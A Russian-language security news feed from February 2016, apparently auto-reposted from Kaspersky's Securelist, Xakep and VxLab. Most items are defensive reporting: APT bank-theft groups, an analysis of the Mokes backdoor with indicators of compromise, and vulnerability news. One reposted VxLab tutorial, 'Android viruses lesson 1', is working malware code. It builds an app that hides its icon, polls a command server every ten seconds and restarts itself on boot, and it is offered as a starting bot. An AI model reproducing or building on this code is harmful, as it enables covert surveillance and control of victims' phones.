После того, как мы раскрыли группировку Carbanak ровно год назад, она исчезла примерно на 5 месяцев, и мы думали, что группа распалась. Однако в сентябре прошлого года наши друзья из CSIS опубликовали запись в блоге, в которой подробно описывается новая разновидность атаки Carbanak, которой подвергся один из их покупателей.

В декабре 2015 мы подтвердили, что группировка все еще активна. «Лаборатория Касперского» обнаружила признаки Carbanak в двух случаях вторжения ― в телекоммуникационной компании и в финансовой организации.

Увеличивается количество APT-ограблений банков с использованием атак Metel, GCMAN и Carbanak 2.0

Исполняемые файлы, обнаруженные в системе мониторинга вторжений в ходе расследования инцидента с Carbanak

Интересной особенностью группировки Carbanak 2.0 является то, что у них другой профиль жертв. Группа больше не интересуется банками, теперь их цели ― это бюджетные и бухгалтерские отделы любой интересующей их организации, при этом они используют те же средства и техники, характерные для APT-атак.

inf_Carbanak2_RU

В одном примечательном деле злоумышленник Carbanak 2.0 использовал доступ к финансовой организации, в которой хранилась информация о держателях акций, чтобы изменить данные о владельцах большой компании. Информация о владельце компании была изменена на данные «дропа». Не понятно, как они хотели воспользоваться этой информацией в дальнейшем.

Продукты Лаборатории Касперского успешно детектируют и блокируют вредоносное ПО, используемое группировками Carbanak 2.0, Metel и GCMAN, под следующими именами:

  • Trojan-Dropper.Win32.Metel
  • Backdoor.Win32.Metel
  • Trojan-Banker.Win32.Metel
  • Backdoor.Win32.GCMan
  • Backdoor.Win64.GCMan
  • Trojan-Downloader.Win32.GCMan
  • Trojan-Downloader.Win32.Carbanak
  • Backdoor.Win32.Carbanak

Лаборатория Касперского настоятельно рекомендует всем организациям внимательно просканировать свои сети на предмет присутствия Carbanak, Metel и GCMAN и, в случае обнаружения, очистить системы/компьютеры/сети и сообщить о вторжении органам правопорядка.

Вся информация доступна для клиентов службы аналитических отчетов, они также получат индикаторы компрометации и контекстную информацию сразу же, как они станут доступными.

Файлы IOC доступны здесь:
Metel
GCMAN
Carbanak 2.0



from Securelist - Всё об интернет-безопасности http://ift.tt/24557Qv
via IFTTT

Плагин Torrents-Time не нравится правообладателям и экспертам по безопасности

Плагин Torrents-Time, который буквально превратил крупнейшие торрент-трекеры сети в онлайновые кинотеатры, уже привлек к себе немало внимания. Происходящее, вполне ожидаемо, не нравится правообладателям, которые уже пригрозили судебным преследованием всем, кому только смогли. Но, помимо этого, известный исследователь в области информационной безопасности Эндрю Сампсон (Andrew Sampson) изучил Torrents-Time и пришел к выводу, что плагин небезопасен.

from «Хакер» http://ift.tt/1Vg9zWC
via IFTTT

Стриминг против пиратства: решающая битва за зрителя

Для подписчиков
Забавная ситуация: пираты, Голливуд и Кремниевая долина, по сути, сражаются за будущее кинематографа, причем последнее оружие в этой войне — юзабилити. И поскольку этот сложный конфликт уже в ближайшие годы может вступить в фазу решающей битвы, пора разобраться, что происходит и почему.

from «Хакер» http://ift.tt/1oipoSp
via IFTTT

Алгоритм шифровальщиков HydraCrypt и UmbreCrypt взломан

Эксперт компании Emsisoft Фабиан Восар (Fabian Wosar) сумел взломать алгоритмы шифрования многих вымогательских вредоносов, чем изрядно разозлил немало хакеров. Тем не менее, Восар на достигнутом не останавливается: теперь он сумел одолеть семейство шифровальщиков HydraCrypt и UmbreCrypt и уже представил инструмент для расшифровки данных.

from «Хакер» http://ift.tt/244HKqa
via IFTTT

воскресенье, 14 февраля 2016 г.

В роутерах Asus обнаружен опасный баг

Независимый исследователь Девид Лонджнекер (David Longenecker) обнаружил очень простую и очень неприятную уязвимость в маршрутизаторах компании Asus, работающих на базе прошивки ASUSWRT. «Благодаря» проблемам в интерфейсе, панель администратора доступна удаленно всем желающим.

from «Хакер» http://ift.tt/213UlaE
via IFTTT

Арестован подозреваемый во взломе глав ЦРУ, ФБР и Национальной разведки

Представители ФБР и британской полиции сообщили изданию The Daily Dot, что им удалось найти и арестовать 16-летнего подростка, которого правоохранители связывают с группой Crackas with Attitude. Хакер под псевдонимом Cracka ранее взял на себя ответственность за взлом личной почты директора ЦРУ, заместителя директора ФБР и главы Национальный разведки США.

from «Хакер» http://ift.tt/1QgEQV1
via IFTTT

пятница, 12 февраля 2016 г.

Мосгорсуд не стал блокировать зеркала RuTracker

Мосгорсуд не пошел навстречу представителям издательства «Эксмо» и компании «СБА Продакшн», которые просили распространить пожизненную блокировку RuTracker на зеркала ресурса. В постановлении суда сказано, что это создало бы правовую неопределенность.

from «Хакер» http://ift.tt/1TdoXnB
via IFTTT

Правообладатели предложили штрафовать за информацию об обходе блокировок

На сайте Ассоциации по защите авторских прав в интернете (АЗАПИ) опубликован текст законопроекта, подготовленного правообладателями и уже одобренного рабочей группой Роскомнадзора. Теперь предлагают штрафовать пользователей даже за публикацию информации о способах обхода блокировок.

from «Хакер» http://ift.tt/1KfMIdo
via IFTTT

От Linux к Windows: обнаружено новое семейство кроссплатформенных бэкдоров для персональных компьютеров

no-image

Введение

Недавно мы обнаружили новое семейство кроссплатформенных бэкдоров для персональных компьютеров. Сначала мы получили вариант для Linux, а затем, благодаря информации, извлеченной из его исполняемого файла, нам удалось также найти вариант для компьютеров на ОС Windows. Более того, версия для Windows была подписана действительной цифровой подписью. Ниже мы рассмотрим оба вредоносных образца.

DropboxCache, он же Backdoor.Linux.Mokes.a

Этот бэкдор для операционных систем семейства Linux распространяется упакованным утилитой UPX. Он содержит обширный функционал, связанный с мониторингом активности жертвы, включая код, обеспечивающий захват аудио и создание снимков экрана.

От Linux к Windows: обнаружено новое семейство кроссплатформенных бэкдоров для персональных компьютеров

После первого запуска бэкдор проверяет путь с собственному исполняемому файлу и при необходимости копирует его в одну из следующих папок:

  • $HOME/$QT-GenericDataLocation/.mozilla/firefox/profiled
  • $HOME/$QT-GenericDataLocation/.dropbox/DropboxCache

Например, путь к исполняемому файлу может быть таким: $HOME/.local/share/.dropbox/DropboxCache. Для закрепления в системе вредоносная программа применяет следующий метод, практически никак не препятствующий ее обнаружению: создает .desktop-файл $HOME/.config/autostart/$filename.desktop. Вот шаблон, по которому это делается:

От Linux к Windows: обнаружено новое семейство кроссплатформенных бэкдоров для персональных компьютеров

Затем вредоносная программа соединяется с командным сервером, адрес которого в явном виде прописан в ее коде. С этого момента она каждую минуту отправляет на сервер HTTP-запрос:

От Linux к Windows: обнаружено новое семейство кроссплатформенных бэкдоров для персональных компьютеров

В качестве ответа на этот «импульсный» (heartbeat) запрос приходят изображения размером 1 байт. Для загрузки данных на сервер и получения данных и команд вредоносная программа соединяется с TCP-портом 433 по нестандартному протоколу с применением шифрования AES. В теле исполняемого файла «зашиты» следующие открытые ключи:

От Linux к Windows: обнаружено новое семейство кроссплатформенных бэкдоров для персональных компьютеров

Далее вредоносная программа копирует собранные клавиатурным шпионом данные, захваченные аудиопотоки и сделанные снимки экрана в папку /tmp/. Позднее собранные данные загружаются на командный сервер.

  • /tmp/ss0-DDMMyy-HHmmss-nnn.sst (снимки экрана, JPEG, каждые 30 секунд)
  • /tmp/aa0-DDMMyy-HHmmss-nnn.aat (захваченные аудиопотоки, WAV)
  • /tmp/kk0-DDMMyy-HHmmss-nnn.kkt (перехваченные клавиатурные нажатия)
  • /tmp/dd0-DDMMyy-HHmmss-nnn.ddt (произвольные данные)

DDMMyy = дата: 280116 = 2016-01-28

HHmmss = время: 154411 = 15:44:11

nnn = миллисекунды.

От Linux к Windows: обнаружено новое семейство кроссплатформенных бэкдоров для персональных компьютеров

Эта часть кода способна захватывать аудио на компьютере жертвы

Следует отметить, что захват аудио, как и клавиатурный шпион, не активирован в таймере событий данного исполняемого файла. Поскольку авторы статически скомпоновали с исполняемым файлом libqt, xkbcommon (библиотеку, обрабатывающую раскладки клавиатуры) и OpenSSL (1.0.2c), размер исполняемого файла – около 13МБ. Киберпреступники не предприняли заметных усилий по обфускации исполняемого файла. Более того, исполняемый файл содержит почти все символы, что очень помогает в процессе анализа.

От Linux к Windows: обнаружено новое семейство кроссплатформенных бэкдоров для персональных компьютеров

В исполняемом файле также имеется список файлов, которые содержат исходный код автора:

От Linux к Windows: обнаружено новое семейство кроссплатформенных бэкдоров для персональных компьютеров

Очевидно, вредоносная программа написана на C++ с использованием Qt – кроссплатформенного фреймворка для разработки приложений. Если верить метаданным исполняемого файла, он скомпилирован с помощью «GCC 4.8.4 (Ubuntu 4.8.4-2ubuntu1~14.04)» на операционной системе Ubuntu 14.04 LTS «Trusty Tahr». Исходя из временного штампа qt_instdate, дата последней конфигурации источников в Qt – 2015-09-26 (qt/qtbase.git: deprecated). Это означает, что, по всей вероятности, программа была скомпилирована не раньше конца сентября 2015 года.

Мы детектируем данное вредоносное ПО как Backdoor.Linux.Mokes.a.

OLMyJuxM.exe aka Backdoor.Win32.Mokes.imv

Всего несколько дней назад мы обнаружили образец, который выглядел очень знакомо, хотя и был скомпилирован для машин под управлением Microsoft Windows. Очень скоро выяснилось, что это вариант Backdoor.Linux.Mokes.a для 32-битных операционных систем Windows.

После запуска на выполнение вредоносная программа случайным образом выбирает один из девяти различных вариантов размещения в папке %AppData% и копирует себя туда, чтобы закрепиться на зараженном компьютере. Исполняемый файл также создает файл «version» в той же папке, куда до этого поместила свою копию. Как можно заключить из имени, в этом файле хранится только информация о версии вредоносной программы вместе с полным путем, по которому лежит копия вредоносной программы:

От Linux к Windows: обнаружено новое семейство кроссплатформенных бэкдоров для персональных компьютеров

Затем в HKCU\Software\Microsoft\Windows\CurrentVersion\Run создаются соответствующие ключи реестра, позволяющие обеспечить закрепление вредоносной программы в системе.

Запустив на выполнение собственную копию, размещенную в новом месте, вредоносная программа задействует SetWindowsHook API, чтобы внедрить функционал клавиатурного шпиона и отслеживать ввод, который осуществляется с помощью мыши, а также ввод внутренних сообщений, помещаемых в очередь сообщений.

Следующий этап функционирования вредоносной программы – установление соединения с командным сервером, явно прописанным в ее коде. Несмотря на то что версии вредоносной программы для различных платформ используют разные IP-адреса и ключи шифрования, они ведут себя почти одинаково.

От Linux к Windows: обнаружено новое семейство кроссплатформенных бэкдоров для персональных компьютеров

Однако этот конкретный вариант имеет немного иную реализацию и пытается получить используемую в Windows по умолчанию строку user-agent.

От Linux к Windows: обнаружено новое семейство кроссплатформенных бэкдоров для персональных компьютеров

Если эта попытка оказывается неудачной, образец использует вариант, прописанный в нем в явном виде:

От Linux к Windows: обнаружено новое семейство кроссплатформенных бэкдоров для персональных компьютеров

Как и версия для Linux, этот вариант вредоносной программы устанавливает соединение со своим командным сервером и отправляет на него раз в минуту «импульсный» сигнал по HTTP (GET /v1). Для получения команд и загрузки на сервер или на зараженный компьютер дополнительных ресурсов используется TCP порт 433.

Этот вариант использует почти такие же шаблоны имен файлов для сохранения полученных снимков экрана, захваченных аудиопотоков, журналов клавиатурных нажатий и других произвольных данных. Но в отличие от варианта для Linux, в данном образце клавиатурный шпион активирован. Ниже показано содержимое журнала клавиатурных нажатий, созданного данным образцом и сохраненного в %TEMP%:

От Linux к Windows: обнаружено новое семейство кроссплатформенных бэкдоров для персональных компьютеров

И здесь мы обнаружили код, который можно назвать неожиданным. На приведенном ниже снимке экрана упоминается код, предназначенный для захвата изображений с подключенной к компьютеру камеры, например встроенной веб-камеры.

От Linux к Windows: обнаружено новое семейство кроссплатформенных бэкдоров для персональных компьютеров

Как и в версии для Linux, автор оставил в исполняемом файле немало подозрительных строк. Показанный ниже снимок экрана содержит строку с удивительно правдивой информацией.

От Linux к Windows: обнаружено новое семейство кроссплатформенных бэкдоров для персональных компьютеров

Для киберпреступника важно, чтобы программа выглядела легитимной и система не запрашивала у пользователя подтверждения перед выполнением неизвестного ПО. На машинах под управлением Windows этого можно добиться, подписывая код доверенными сертификатами. В данном случае киберпреступнику удалось подписать исполняемый файл доверенным сертификатом, выданным центром сертификации «COMODO RSA Code Signing CA».

От Linux к Windows: обнаружено новое семейство кроссплатформенных бэкдоров для персональных компьютеров

Мы детектируем данный тип вредоносного ПО как Backdoor.Win32.Mokes.imv.

Что дальше

Поскольку это ПО изначально создавалось как платформонезависимое, не исключено, что в будущем мы увидим соответствующие образцы для Mac OS X.

Дополнение от 01.02.2016

Мы только что получили Backdoor.Win32.Mokes.imw. Впервые мы видим вариант Mokes, в котором активирован модуль захвата аудио. Вредоносная программа создает новый аудиофайл каждые 5 минут.

От Linux к Windows: обнаружено новое семейство кроссплатформенных бэкдоров для персональных компьютеров

Индикаторы заражения

Backdoor.Linux.Mokes.a

c9e0e5e2aeaecb232120e8573e97a6b8

$HOME/$QT-GenericDataLocation/.mozilla/firefox/profiled
$HOME/$QT-GenericDataLocation/.dropbox/DropboxCache
$HOME/.config/autostart/profiled.desktop
$HOME/.config/autostart/DropboxCache.desktop

/tmp/ss0-$date-$time-$ms.sst

Backdoor.Win32.Mokes.imv & .imw

f2407fd12ec0d4f3e82484c027c7d149 (imw)
91099aa413722d22aa50f85794ee386e (imv)

%AppData%\Skype\SkypeHelper.exe
%AppData%\Skype\version
%AppData%\Dropbox\bin\DropboxHelper.exe
%AppData%\Dropbox\bin\version
%AppData%\Google\Chrome\nacl32.exe
%AppData%\Google\Chrome\version
%AppData%\Google\Chrome\nacl64.exe
%AppData%\Google\Chrome\version
%AppData%\Mozilla\Firefox\mozillacache.exe
%AppData%\Mozilla\Firefox\version
%AppData%\Hewlett-Packard\hpqcore.exe
%AppData%\Hewlett-Packard\version
%AppData%\Hewlett-Packard\hpprint.exe
%AppData%\Hewlett-Packard\version
%AppData%\Hewlett-Packard\hpscan.exe
%AppData%\Hewlett-Packard\version
%AppData%\Adobe\Acrobat\AcroBroker.exe
%AppData%\Adobe\Acrobat\version

%TEMP%\aa$n-$date-$time-$ms.aat (imw)
где $n – десятичное представление хэша, рассчитанного на основе имени звуковой карты

%TEMP%\ss0-$date-$time-$ms.sst
%TEMP%\dd0-$date-$time-$ms.ddt
%TEMP%\kk$date.kkt

HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run «%PERSISTENT-FILENAME%», «%PERSISTENT-FILEPATH%»

где %PERSISTENT-FILENAME% – одно из перечисленных выше имен файлов
и %PERSISTENT-FILEPATH% – соответствующий путь



from Securelist - Всё об интернет-безопасности http://ift.tt/20ssU8t
via IFTTT

В Skype снова появилась вредоносная реклама

Методика распространения малвари через рекламные сети не нова. Однако пострадать от таких атак могут не только пользователи браузеров. Специалисты F-Secure обнаружили вредоносную рекламную кампанию, поразившую пользователей Skype.

from «Хакер» http://ift.tt/240EsnT
via IFTTT

Windows 10 следит за пользователем, даже если все сетевые службы отключены

О том, как отключить слежку в Windows 10, написано множество статей и мануалов, а также для этого созданы специальные утилиты. Мы тоже рассказывали на страницах ][ о том, куда «стучит» Windows 10 и как это прекратить. Но, как показывает практика, новую ОС Microsoft не может остановить ничто. Даже когда все функции мониторинга выключены, Windows 10 выходит на связь более 5500 раз в день.

from «Хакер» http://ift.tt/20Z2P2J
via IFTTT

Карманный софт. Выпуск #16. Продуктивность

Для подписчиков
В этом выпуске: быстро находим определения и перевод выделенных слов, ищем самый простой способ переключения между запущенными приложениями, создаем список дел, о котором ты точно не забудешь, и добавляем поддержку макросов во все поля ввода. Приятного чтения!

from «Хакер» http://ift.tt/1V8drsG
via IFTTT

Операторы вымогателя CryptoWall заработали более $330 000 за три месяца

Специалисты компании Imperva проанализировали работу операторов шифровальщика CryptoWall, проследив всего за одной вредоносной кампанией из многих. Ранее уже сообщалось, что вымогательское ПО приносит своим операторам миллионы долларов, и эксперты в очередной раз подтвердили этот печальный факт.

from «Хакер» http://ift.tt/1PGW9PM
via IFTTT

Если выставить на iPhone дату 1.01.1970, он превратится в кирпич

Крайне не советуем проверять описанный в этой статье баг на практике. Пользователи Reddit обнаружили, что устройства Apple подвержены странной проблеме: достаточно выставить на iPhone или iPad дату 1 января 1970 года, перезагрузить девайс и... ты получишь красивый, дорогостоящий кирпич. Устройство откажется возобновлять работу.

from «Хакер» http://ift.tt/1o5lhZd
via IFTTT

четверг, 11 февраля 2016 г.

Герман Клименко о шифровании, криптовалюте и пиратстве

На днях издание «Лента.ру» пообщалось с советником президента РФ по интернету Германом Клименко, задав ему вопросы не только о борьбе с пиратством и трекерами, как поступают все в последнее время. Речь также зашла о криптовалютах, end-to-end шифровании и Павле Дурове. Мы выбрали для тебя самые интересные моменты беседы.

from «Хакер» http://ift.tt/1QaTRYy
via IFTTT

Вирусы под андроид. Урок №1 (Начало начал)

Статья от нашего друга allmore

Как стать “хакером” андроида?

Да тут особо ни чего мудрить не надо. Просто идем по шагам.
1. Устанавливаем java для разработчиков с офф сайта. (скачать)
2. Качаем android studio (скачать) Качаем полную рекомендованную. Сейчас мы не будем вдаваться в эти все подробности. Оно нам надо?
3. Запасаемся бубликами и пивом. Ведь сейчас придется все это поставить и настроить.
4. Тыкаем в основном далее, не вдумываясь что там написано. Незачем забивать голову :)
5. После чего как мы установили все это. Запускаем студию. Ищем сверху значок SDK Manager. Он где-то справа. Нажимаем, ставим везде галки, соглашаемся с условиями и нажимаем инсталл.
6. Опять грызем бублики и пьем великолепное пиво. Тут процесс по дольше, так как будут выкачиваться виртуалки и всяческие тулзы.
7. Ну вот собственно и все.

Как все начиналось?

Мы все поставили, теперь стоит и подумать, а как тут теперь вирус написать :) А для этого мы идем в File -> New -> New project. И тут нам предлагают придумать название проекта и домен сайта компании. Вводим что взбредёт в голову. На основе этих данных генерируется package имя. Которое используется как уникальный идентификатор нашего APK. Жмем далее. Тут нам предлагают выбрать платформу под наш проект. Ну тут мы выбираем только Phone. Остальное рассмотрим позже. Далее. И теперь нам предлагают выбрать как будет выглядеть наше окошечко (Activity) стартовое, главное. Тут есть важная особенность. Чтобы запустить какой либо код сразу после установки, нужно чтобы было какой либо из окошек при старте. Поэтому выбираем любое кроме No Activity. Лучше всего выбрать Empty. Будет легче его вычищать, от ненужного мусора. Далее. Пишем название окошку и нажимаем Finish.

Будет немного времени , чтобы бахнуть еще пивка. Пока файлы нового проекта индексируются и настраивается сборщик проекта.

Эй, ты слишком жирный!

Пробуем собрать проект наш. Build -> Generate signed apk.. И что мы видим? APK с 1 окошком и приложением которое ни чего не делает. Занимает 1 мегабайт. Надо с этим что-то делать, а именно отказывать от библиотек (AppCompat). Это красивая графика, которая нам не нужна.
Переходи в файл MainActivity.java
Заменяем

public class MainActivity extends AppCompatActivity

на

public class MainActivity extends Activity

Удаляем

import android.support.v7.app.AppCompatActivity;

Заходим в настройки проекта и во вкладке Dependes удаляем строку с AppCompat. Далее переходим к файлу values.xml и styles.xml. Удаляем их.
Заходим в androidManifest.xml и
меняем

android:theme="@style/AppTheme"

на

android:theme="@android:style/Theme.Translucent.NoTitleBar"

Собираем наше приложение, ура! размер меньше 40 кб. Уже есть с чем работать.

Почему ты не прячешься?

Далее, нам нужно спрятать нашего зверька. Чтобы иконка не была видна в списке менеджера приложений. А так же надо закрыть наше приложение.
Вставляем после setContentView(R.layout.activity_main) Следующий код:

String pgkname = getApplicationContext().getPackageName();
ComponentName componentToDisable = new ComponentName(pgkname,pgkname+".MainActivity");
getApplicationContext().getPackageManager().setComponentEnabledSetting(
    componentToDisable,
    PackageManager.COMPONENT_ENABLED_STATE_DISABLED,
    PackageManager.DONT_KILL_APP);

Этот код скроет нашу иконку с глаз И после всего этого пишем:

finish();

Теперь наше приложение после установки. Запускается и сразу же скрывается с глаз долой. Ух, проделали мы работу. Но надо идти дальше, а то бот не появиться в админке.

Тук, тук, открывайте, полиция!

Теперь мы должны сделать так, чтобы наш чудесный APK начал стучать в админку. Тут я уже полагаю, что админка где-то написана. И от нас требуется только стучать. Возьмем самый простой метод, он не будет работать корректно на андроидах выше 4.х. Но с чего-то надо же учиться. Я же не за вас работу делаю. Нам нужно создать сервис. Для этого мы создаем файл с новым class. (Правой тыкаем в проекте, на папку Java). Название класса пишем к примеру Network. Нажимаем окей. Удаляем все содержимое файла кроме первой строки где прописан package и заменяем на

import android.app.Service;
import android.content.Intent;
import android.os.IBinder;
import org.apache.http.HttpResponse;
import org.apache.http.client.HttpClient;
import org.apache.http.client.methods.HttpGet;
import org.apache.http.client.methods.HttpPost;
import org.apache.http.entity.StringEntity;
import org.apache.http.impl.client.DefaultHttpClient;
import java.io.InputStream;
import java.util.Timer;
import java.util.TimerTask;
public class Network extends Service{
    @Override
    public int onStartCommand(Intent intent, int flags, int startId) {
        return Service.START_STICKY;
    }
    @Override
    public IBinder onBind(Intent intent) {
        throw new UnsupportedOperationException("");
    }
    @Override
    public void onCreate()
    {
        MyTimerTask myTask = new MyTimerTask();
        Timer myTimer = new Timer();
        myTimer.schedule(myTask, 10000, 10000);
    }
    class MyTimerTask extends TimerTask {
        public void run() {
            String result = "";
            result = GET("http://site.ru/?q=");
            // Обработка result
        }
    }
    public String GET(String url){
        InputStream inputStream = null;
        String result = "";
        try {
            HttpClient httpclient = new DefaultHttpClient();
            HttpResponse httpResponse = httpclient.execute(new HttpGet(url));
            inputStream = httpResponse.getEntity().getContent();
            if(inputStream != null)
                result = convertInputStreamToString(inputStream);
            else
                result = "";
        } catch (Exception e) {
        }
        return result;
    }
}

Это код описывает класс сервиса, в котором при запуске, запускает таймер и каждые 10 секунд отправляет GET запрос наURL и запрашивает ответ. Но это не все. Этот код не будет работать если мы объявим наш сервис в манифесте и не дадим права выходить в интернет нашему приложению. Идем в манифест.
Добавляем

<uses-permission android:name="android.permission.INTERNET" />

и в описание application

<service android:name=".Network" />

Осталось запустить наш сервис. Идем в MainActivity и перед finish() вставляем запуск сервиса

getApplicationContext().startService(new Intent(getApplicationContext(), Network.class));

Финишная линия

Теперь у нас есть апк, который сам себя скрывает после запуска и запускает процесс отстука в админ панель. Где написано // Обработка result : там происходит обработка ответа и команд админки. Не сложно, правда? Но пока мы пили пиво. Мы совсем забыли, что если телефон перезагрузят. То наше приложение уже ни когда не запустится. Для этого мы идем опять в манифест.
Добавляем права на запуск после ребута:

<uses-permission android:name="android.permission.RECEIVE_BOOT_COMPLETED" />

Добавляем обязательно обработчик в описание application

<receiver
            android:name=".Boot"
            android:enabled="true" >
            <intent-filter>
                <action android:name="android.intent.action.BOOT_COMPLETED" />
                <action android:name="android.intent.action.QUICKBOOT_POWERON" />
            </intent-filter>
        </receiver>

Теперь после перезапуска у нас вызовется класс Boot. И сейчас мы его создадим. Все делаем как я писал выше. Создали и удалили все кроме package.

import android.content.BroadcastReceiver;
import android.content.Context;
import android.content.Intent;
public class Boot extends BroadcastReceiver {
    @Override
    public void onReceive(Context context, Intent arg1) {
                context.startService(new Intent(context, Network.class));
    }
}

Конец, и пару слов.

Если есть вопросы, задавайте. В окончании у нас появился прям такой игрушечный бот (APK). Что послужит вам хорошей базой и внесет немного понимания, как это все работает. Спасибо за внимание. Надеюсь будет продолжение :) Сильно не пинайте, опыт первый, да и еще ночью пришлось писать. А вот критику хотелось бы услышать, чтобы след урок получился лучше.

Запись Вирусы под андроид. Урок №1 (Начало начал) впервые появилась VxLab.



from VxLab http://ift.tt/1Tb968Y
via IFTTT

Пароли от мозговых кошельков Bitcoin ничем не лучше обычных

Результаты совместного исследования обнародовали специалисты Университетского колледжа Лондона, Международной ассоциации криптологических исследований (IACR) и компании White Ops. Эксперты изучили так называемые «мозговые кошельки» Bitcoin, призванные повысить безопасность пользователей и облегчить им жизнь. Увы, исследование принесло печальные результаты: мнемонические пароли ничем не лучше обычных.

from «Хакер» http://ift.tt/1RsHHiT
via IFTTT

Взломанная и раскритикованная VTech расписалась в том, что ее сервисы небезопасны

В декабре 2015 года подвергся взлому производитель детских гаджетов и игрушек – компания VTech. Тогда в результате утечки данных пострадали порядка 11 млн пользователей, больше половины из которых – дети. Эксперты немедленно заинтересовались продуктами и сервисами компании, а изучив их, пришли к неутешительным выводам: о безопасности разработчики VTech почему-то не думают вовсе. Теперь компания решила в ответ снять с себя все обязательства, изменив официальный текст документа об условиях и ограничениях (terms and conditions) использования своих продуктов.

from «Хакер» http://ift.tt/1O4ugiA
via IFTTT

Группа Poseidon занимается кибершпионажем с 2005 года

В рамках саммита Security Analyst Summit специалисты «Лаборатории Касперского» представили еще один интересный доклад. Эксперты рассказали об обнаружении группы Poseidon, которая использует в работе одноименную малварь. Начиная с далекого 2005 года, Poseidon похищают конфиденциальные данные у компаний по всему миру. Затем хакеры шантажом заставляют своих жертв заключить с ними контракт на предоставление консалтинговых услуг по информационной безопасности.

from «Хакер» http://ift.tt/1Q94A5H
via IFTTT

Черная магия Git hook. Как не пустить джуниоров в мастер-ветку и вообще все автоматизировать

Для подписчиков
При code review ты указываешь разработчикам на забытые printf и console.log? С ужасом видишь код с синтаксической ошибкой? Хочешь разграничить права на работу с ветками, потому что джуниор путает порядок при слиянии? Хватит это терпеть! У нас же есть Git и Bash!

from «Хакер» http://ift.tt/1o5I1sx
via IFTTT

Эксперт: APT Poseidon

no-image

Дмитрий Бестужев, руководитель латиноамериканского исследовательского центра «Лаборатории Касперского» (GReAT), рассказывает о португалоязычной киберпреступной группе, создавшей бутик таргетированных атак Poseidon, о ее целях, жертвах и особенностях.

Больше информации о новой угрозе в статье Poseidon: бутик для киберпреступников



from Securelist - Всё об интернет-безопасности http://ift.tt/1Te3DPT
via IFTTT

Хакеры подделали 101 000 деклараций и обокрали Федеральную налоговую службу США

Представители Федеральной налоговой службы США (IRS) официально подтвердили – они подверглись кибератаке. Злоумышленники использовали ворованные номера социального страхования для создания фальшивых налоговых документов. Подделывая бумаги, хакеры переводили на свои счета все налоговые возвраты и вычеты ничего не подозревающих граждан.

from «Хакер» http://ift.tt/1o5xxJR
via IFTTT

среда, 10 февраля 2016 г.

Microsoft устранила 41 уязвимость, включая ряд критических

Очередной Patch Tuesday принес большую порцию обновлений. Специалисты Microsoft исправили уязвимости как в составе Windows, так и в браузерах Edge и Internet Explorer, Windows PDF Viewer и Microsoft Office. Суммарно компания представила 13 бюллетеней безопасности, 6 из них получили статус «критических», а еще 7 – «важных».

from «Хакер» http://ift.tt/1O4bjMV
via IFTTT

Кроссплатформенный бэкдор Adwind продается как услуга

Эксперты «Лаборатории Касперского» рассказали о малвари, которая распространяется в редком на сегодня формате «вредоносное ПО как услуга». Впервые данный RAT (remote access trojan) был замечен еще в 2013 году, и с тех пор он известен под именами Adwind, AlienSpy, Frutas, Unrecom, Sockrat и jRAT. В общей сложности от Adwind пострадали уже более 440 тысяч пользователей и организаций по всему миру. Сейчас вредонос используется в основном для кибершпионажа.

from «Хакер» http://ift.tt/1KGYWLW
via IFTTT

«Добрые хакеры» White Team сражаются с ботнетом Lizard Squad, взламывая роутеры

Хакерская группа White Team, ранее создавшая «добрый вирус» Linux.Wifatch, который инфицирует IoT-устройства и исправляет на них уязвимости, продолжает бороться со злом. Linux.Wifatch рассказали изданию Forbes, что в данный момент они заняты борьбой с ботнетом известной хакерской группы Lizard Squad, в котором насчитывается порядка 120-150 тысяч девайсов.

from «Хакер» http://ift.tt/1Q78Hiw
via IFTTT

Эксперт: Как я взломал больницу

no-image

Сергей Ложкин, старший эксперт команды глобальных исследований «Лаборатории Касперского» рассказывает о многочисленных уязвимостях, найденных им в ИТ-инфраструктуре одной из московских больниц. Конференция Kaspersky Security Analyst Summit 2016 на Тенерифе, Испания.



from Securelist - Всё об интернет-безопасности http://ift.tt/1QVlJmw
via IFTTT

Обнаружены уязвимости в библиотеке обработки шрифтов Libgraphite

В современном мире уязвимость может обнаружиться где угодно, скомпрометировать систему могут даже шрифты. Сотрудники Talos (подразделения компании Cisco) обнаружили, что библиотека Libgraphite, использующаяся для обработки шрифтов, небезопасна и страдает от ряда различных проблем.

from «Хакер» http://ift.tt/1TS0YuM
via IFTTT

Опубликованы данные тысяч сотрудников ФБР и Министерства национальной безопасности

Неизвестный хакер обнародовал через Twitter-аккаунт @DotGovs данные 9000 сотрудников Министерства национальной безопасности США. Вслед за первым дампом, был опубликован второй, содержащий информацию о 20 000 сотрудниках ФБР, включая их имена, должности, телефонные номера и адреса email.

from «Хакер» http://ift.tt/20oj5bo
via IFTTT

Microsoft прекратит скрывать информацию об апдейтах Windows 10

Тогда как обновления для Windows 10 выходят постоянно и регулярно, начиная с релиза новой ОС, в июле прошлого года, Microsoft не жаждала делиться подробностями о том, что входит в состав этих обновлений. Фактически, пользователям каждый раз предлагается установить кота в мешке. Теперь эта скверная тенденция наконец изменится.

from «Хакер» http://ift.tt/1mrXhyc
via IFTTT

Гаджеты команды ][. Какими смартфонами, планшетами и умными часами пользуются сотрудники журнала

Для подписчиков
Читая наш журнал, особенно многочисленные статьи рубрики X-Mobile о рутинге, джейлбрейке, архитектуре Android и настройке производительности, ты мог подумать, что все мы здесь пользуемся рутованными смартфонами с несколькими операционками и взломанными айфонами с кучей софта для вардрайвинга. Если так, то добро пожаловать под кат, ибо там ты узнаешь, что на самом деле предпочитают использовать сотрудники ][, находясь вдали от дома.

from «Хакер» http://ift.tt/1LgjZQq
via IFTTT

Хочешь взломать Facebook своей девушки и читерить в Hearthstone? Опасайся малвари

Сразу два вредоносных приложения, ориентированные на наивных (или отчаявшихся) пользователей обнаружили эксперты в области информационной безопасности. Первый инструмент предлагает взломать чужой аккаунт Facebook, второй — получить «god mode» в популярной игре Hearthstone компании Blizzard.

from «Хакер» http://ift.tt/1PBVyik
via IFTTT

Киберпреступники грабят банки, используя сложные АРТ-техники

В ходе саммита Security Analyst Summit эксперты команды GReAT (Global Research & Analysis Team) «Лаборатории Касперского» рассказали, что хакеры берут на вооружение всё более сложные техники. В последнее время злоумышленники стали применять трюки, которые ранее можно было увидеть только в исполнении APT-группировок.

from «Хакер» http://ift.tt/1KEIfki
via IFTTT

вторник, 9 февраля 2016 г.

Компания Oracle выпустила экстренное обновление Java для Windows

